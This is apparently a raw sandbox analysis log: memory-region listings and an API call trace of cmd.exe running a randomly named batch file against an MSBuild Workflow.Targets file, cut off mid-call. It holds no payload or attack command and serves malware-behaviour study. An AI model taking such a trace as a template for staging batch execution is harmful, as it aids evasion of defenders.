0x7ffaecf0cfff entry_point = 0x7ffaecef0000 region_type = mapped_file name = "wdi.dll" filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll") Region: id = 6059 start_va = 0x7ffaef3a0000 end_va = 0x7ffaef3d1fff entry_point = 0x7ffaef3a0000 region_type = mapped_file name = "rstrtmgr.dll" filename = "\\Windows\\System32\\RstrtMgr.dll" (normalized: "c:\\windows\\system32\\rstrtmgr.dll") Region: id = 6060 start_va = 0x7ffaf0460000 end_va = 0x7ffaf0476fff entry_point = 0x7ffaf0460000 region_type = mapped_file name = "radarrs.dll" filename = "\\Windows\\System32\\radarrs.dll" (normalized: "c:\\windows\\system32\\radarrs.dll") Region: id = 6061 start_va = 0x7ffaf24b0000 end_va = 0x7ffaf24d1fff entry_point = 0x7ffaf24b0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 6062 start_va = 0x7ffaf2d10000 end_va = 0x7ffaf2da5fff entry_point = 0x7ffaf2d10000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 6063 start_va = 0x7ffaf3ed0000 end_va = 0x7ffaf3f05fff entry_point = 0x7ffaf3ed0000 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 6064 start_va = 0x7ffaf4180000 end_va = 0x7ffaf41a5fff entry_point = 0x7ffaf4180000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 6065 start_va = 0x7ffaf4260000 end_va = 0x7ffaf4287fff entry_point = 0x7ffaf4260000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 6066 start_va = 0x7ffaf4290000 end_va = 0x7ffaf42fafff entry_point = 0x7ffaf4290000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 6067 start_va = 0x7ffaf4440000 end_va = 0x7ffaf4489fff entry_point = 0x7ffaf4440000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 6068 start_va = 0x7ffaf4490000 end_va = 0x7ffaf44a2fff entry_point = 0x7ffaf4490000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 6069 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 6070 start_va = 0x7ffaf4590000 end_va = 0x7ffaf4bb7fff entry_point = 0x7ffaf4590000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 6071 start_va = 0x7ffaf4bc0000 end_va = 0x7ffaf4c72fff entry_point = 0x7ffaf4bc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 6072 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6073 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 6074 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 6075 start_va = 0x7ffaf53c0000 end_va = 0x7ffaf53f5fff entry_point = 0x7ffaf53c0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 6076 start_va = 0x7ffaf55b0000 end_va = 0x7ffaf56f0fff entry_point = 0x7ffaf55b0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 6077 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6078 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6079 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 6080 start_va = 0x7ffaf5990000 end_va = 0x7ffaf6eb4fff entry_point = 0x7ffaf5990000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 6081 start_va = 0x7ffaf6ec0000 end_va = 0x7ffaf6f64fff entry_point = 0x7ffaf6ec0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 6082 start_va = 0x7ffaf6f70000 end_va = 0x7ffaf70cbfff entry_point = 0x7ffaf6f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 6083 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6084 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 6085 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 6086 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 6087 start_va = 0x7ffaf7860000 end_va = 0x7ffaf78b0fff entry_point = 0x7ffaf7860000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 6088 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6211 start_va = 0x100e030000 end_va = 0x100e0affff entry_point = 0x0 region_type = private name = "private_0x000000100e030000" filename = "" Region: id = 6212 start_va = 0x7ff682bce000 end_va = 0x7ff682bcffff entry_point = 0x0 region_type = private name = "private_0x00007ff682bce000" filename = "" Thread: id = 780 os_tid = 0x954 Thread: id = 781 os_tid = 0xb74 Thread: id = 782 os_tid = 0x59c Thread: id = 783 os_tid = 0x5d4 Thread: id = 784 os_tid = 0x63c Thread: id = 785 os_tid = 0x648 Thread: id = 801 os_tid = 0xd18 Process: id = "81" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x2108e000" os_pid = "0xec4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xbd0" cmd_line = "C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\" \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\"\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3488 start_va = 0xb50000 end_va = 0xb6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b50000" filename = "" Region: id = 3489 start_va = 0xb70000 end_va = 0xb71fff entry_point = 0x0 region_type = private name = "private_0x0000000000b70000" filename = "" Region: id = 3490 start_va = 0xb80000 end_va = 0xb93fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b80000" filename = "" Region: id = 3491 start_va = 0xba0000 end_va = 0xbdffff entry_point = 0x0 region_type = private name = "private_0x0000000000ba0000" filename = "" Region: id = 3492 start_va = 0xbe0000 end_va = 0xcdffff entry_point = 0x0 region_type = private name = "private_0x0000000000be0000" filename = "" Region: id = 3493 start_va = 0xce0000 end_va = 0xce3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 3494 start_va = 0x13d0000 end_va = 0x141ffff entry_point = 0x13d0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 3495 start_va = 0x1420000 end_va = 0x541ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001420000" filename = "" Region: id = 3496 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3497 start_va = 0x7ef80000 end_va = 0x7efa2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ef80000" filename = "" Region: id = 3498 start_va = 0x7efab000 end_va = 0x7efabfff entry_point = 0x0 region_type = private name = "private_0x000000007efab000" filename = "" Region: id = 3499 start_va = 0x7efac000 end_va = 0x7efacfff entry_point = 0x0 region_type = private name = "private_0x000000007efac000" filename = "" Region: id = 3500 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 3501 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3502 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3503 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 3504 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3505 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 3506 start_va = 0xcf0000 end_va = 0xcf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cf0000" filename = "" Region: id = 3507 start_va = 0xd00000 end_va = 0xd01fff entry_point = 0x0 region_type = private name = "private_0x0000000000d00000" filename = "" Region: id = 5455 start_va = 0xe30000 end_va = 0xe3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e30000" filename = "" Region: id = 5456 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5457 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5458 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5459 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5460 start_va = 0xe40000 end_va = 0xfbffff entry_point = 0x0 region_type = private name = "private_0x0000000000e40000" filename = "" Region: id = 6004 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6005 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6006 start_va = 0xb50000 end_va = 0xb5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b50000" filename = "" Region: id = 6007 start_va = 0x7ee80000 end_va = 0x7ef7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ee80000" filename = "" Region: id = 6529 start_va = 0xd10000 end_va = 0xdcdfff entry_point = 0xd10000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6530 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6531 start_va = 0xdd0000 end_va = 0xe0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000dd0000" filename = "" Region: id = 6532 start_va = 0xfc0000 end_va = 0x10bffff entry_point = 0x0 region_type = private name = "private_0x0000000000fc0000" filename = "" Region: id = 6533 start_va = 0x10c0000 end_va = 0x121ffff entry_point = 0x0 region_type = private name = "private_0x00000000010c0000" filename = "" Region: id = 6534 start_va = 0x7efa8000 end_va = 0x7efaafff entry_point = 0x0 region_type = private name = "private_0x000000007efa8000" filename = "" Region: id = 6535 start_va = 0xb60000 end_va = 0xb63fff entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 6664 start_va = 0xb70000 end_va = 0xb73fff entry_point = 0x0 region_type = private name = "private_0x0000000000b70000" filename = "" Region: id = 6680 start_va = 0x74540000 end_va = 0x74547fff entry_point = 0x74540000 region_type = mapped_file name = "cmdext.dll" filename = "\\Windows\\SysWOW64\\cmdext.dll" (normalized: "c:\\windows\\syswow64\\cmdext.dll") Region: id = 6681 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 6682 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 6683 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 6684 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 6685 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 6686 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 6687 start_va = 0xe10000 end_va = 0xe1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e10000" filename = "" Region: id = 6792 start_va = 0x5420000 end_va = 0x5756fff entry_point = 0x5420000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 789 os_tid = 0xebc [0264.679] GetModuleHandleA (lpModuleName=0x0) returned 0x13d0000 [0264.679] __set_app_type (_Type=0x1) [0264.679] __p__fmode () returned 0x77984d6c [0264.679] __p__commode () returned 0x77985b1c [0264.679] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x13e36e0) returned 0x0 [0264.679] __getmainargs (in: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0, _DoWildCard=0, _StartInfo=0x13f50fc | out: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0) returned 0 [0264.679] GetCurrentThreadId () returned 0xebc [0264.679] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xebc) returned 0x84 [0264.679] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0264.679] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadUILanguage") returned 0x75172780 [0264.679] SetThreadUILanguage (LangId=0x0) returned 0x409 [0264.721] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0264.721] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0xcdfc98 | out: phkResult=0xcdfc98*=0x0) returned 0x2 [0264.722] VirtualQuery (in: lpAddress=0xcdfc9f, lpBuffer=0xcdfc50, dwLength=0x1c | out: lpBuffer=0xcdfc50*(BaseAddress=0xcdf000, AllocationBase=0xbe0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0264.722] VirtualQuery (in: lpAddress=0xbe0000, lpBuffer=0xcdfc50, dwLength=0x1c | out: lpBuffer=0xcdfc50*(BaseAddress=0xbe0000, AllocationBase=0xbe0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0264.722] VirtualQuery (in: lpAddress=0xbe1000, lpBuffer=0xcdfc50, dwLength=0x1c | out: lpBuffer=0xcdfc50*(BaseAddress=0xbe1000, AllocationBase=0xbe0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0264.722] VirtualQuery (in: lpAddress=0xbe3000, lpBuffer=0xcdfc50, dwLength=0x1c | out: lpBuffer=0xcdfc50*(BaseAddress=0xbe3000, AllocationBase=0xbe0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0264.722] VirtualQuery (in: lpAddress=0xce0000, lpBuffer=0xcdfc50, dwLength=0x1c | out: lpBuffer=0xcdfc50*(BaseAddress=0xce0000, AllocationBase=0xce0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0264.722] GetConsoleOutputCP () returned 0x1b5 [0264.767] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0264.767] SetConsoleCtrlHandler (HandlerRoutine=0x13ef980, Add=1) returned 1 [0264.767] _get_osfhandle (_FileHandle=1) returned 0x3c [0264.767] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0264.772] _get_osfhandle (_FileHandle=1) returned 0x3c [0264.772] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0264.775] _get_osfhandle (_FileHandle=1) returned 0x3c [0264.775] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0264.797] _get_osfhandle (_FileHandle=0) returned 0x38 [0264.797] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0264.810] _get_osfhandle (_FileHandle=0) returned 0x38 [0264.810] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0264.871] GetEnvironmentStringsW () returned 0xec7f00* [0264.872] FreeEnvironmentStringsA (penv="A") returned 1 [0264.872] GetEnvironmentStringsW () returned 0xec7f00* [0264.872] FreeEnvironmentStringsA (penv="A") returned 1 [0264.872] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xcdebfc | out: phkResult=0xcdebfc*=0x94) returned 0x0 [0264.872] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xcdec00, lpData=0xcdec08, lpcbData=0xcdec04*=0x1000 | out: lpType=0xcdec00*=0x0, lpData=0xcdec08*=0xa8, lpcbData=0xcdec04*=0x1000) returned 0x2 [0264.872] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xcdec00, lpData=0xcdec08, lpcbData=0xcdec04*=0x1000 | out: lpType=0xcdec00*=0x4, lpData=0xcdec08*=0x1, lpcbData=0xcdec04*=0x4) returned 0x0 [0264.872] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xcdec00, lpData=0xcdec08, lpcbData=0xcdec04*=0x1000 | out: lpType=0xcdec00*=0x0, lpData=0xcdec08*=0x1, lpcbData=0xcdec04*=0x1000) returned 0x2 [0264.872] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xcdec00, lpData=0xcdec08, lpcbData=0xcdec04*=0x1000 | out: lpType=0xcdec00*=0x4, lpData=0xcdec08*=0x0, lpcbData=0xcdec04*=0x4) returned 0x0 [0264.872] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xcdec00, lpData=0xcdec08, lpcbData=0xcdec04*=0x1000 | out: lpType=0xcdec00*=0x4, lpData=0xcdec08*=0x40, lpcbData=0xcdec04*=0x4) returned 0x0 [0264.872] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xcdec00, lpData=0xcdec08, lpcbData=0xcdec04*=0x1000 | out: lpType=0xcdec00*=0x4, lpData=0xcdec08*=0x40, lpcbData=0xcdec04*=0x4) returned 0x0 [0264.872] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0xcdec00, lpData=0xcdec08, lpcbData=0xcdec04*=0x1000 | out: lpType=0xcdec00*=0x0, lpData=0xcdec08*=0x40, lpcbData=0xcdec04*=0x1000) returned 0x2 [0264.872] RegCloseKey (hKey=0x94) returned 0x0 [0264.872] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xcdebfc | out: phkResult=0xcdebfc*=0x94) returned 0x0 [0264.872] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xcdec00, lpData=0xcdec08, lpcbData=0xcdec04*=0x1000 | out: lpType=0xcdec00*=0x0, lpData=0xcdec08*=0x40, lpcbData=0xcdec04*=0x1000) returned 0x2 [0264.872] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xcdec00, lpData=0xcdec08, lpcbData=0xcdec04*=0x1000 | out: lpType=0xcdec00*=0x4, lpData=0xcdec08*=0x1, lpcbData=0xcdec04*=0x4) returned 0x0 [0264.872] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xcdec00, lpData=0xcdec08, lpcbData=0xcdec04*=0x1000 | out: lpType=0xcdec00*=0x0, lpData=0xcdec08*=0x1, lpcbData=0xcdec04*=0x1000) returned 0x2 [0264.872] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xcdec00, lpData=0xcdec08, lpcbData=0xcdec04*=0x1000 | out: lpType=0xcdec00*=0x4, lpData=0xcdec08*=0x0, lpcbData=0xcdec04*=0x4) returned 0x0 [0264.872] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xcdec00, lpData=0xcdec08, lpcbData=0xcdec04*=0x1000 | out: lpType=0xcdec00*=0x4, lpData=0xcdec08*=0x9, lpcbData=0xcdec04*=0x4) returned 0x0 [0264.872] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xcdec00, lpData=0xcdec08, lpcbData=0xcdec04*=0x1000 | out: lpType=0xcdec00*=0x4, lpData=0xcdec08*=0x9, lpcbData=0xcdec04*=0x4) returned 0x0 [0264.872] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0xcdec00, lpData=0xcdec08, lpcbData=0xcdec04*=0x1000 | out: lpType=0xcdec00*=0x0, lpData=0xcdec08*=0x9, lpcbData=0xcdec04*=0x1000) returned 0x2 [0264.872] RegCloseKey (hKey=0x94) returned 0x0 [0264.872] time (in: timer=0x0 | out: timer=0x0) returned 0x5bb43291 [0264.872] srand (_Seed=0x5bb43291) [0264.872] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\" \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\"\"" [0264.872] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\" \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\"\"" [0264.873] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0264.873] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xec7f08, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0264.873] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0264.873] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0264.873] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0264.873] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0264.873] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0264.873] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0264.873] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0264.873] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0264.873] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0264.873] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0264.873] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0264.873] SetEnvironmentVariableW (lpName="PROMPT", 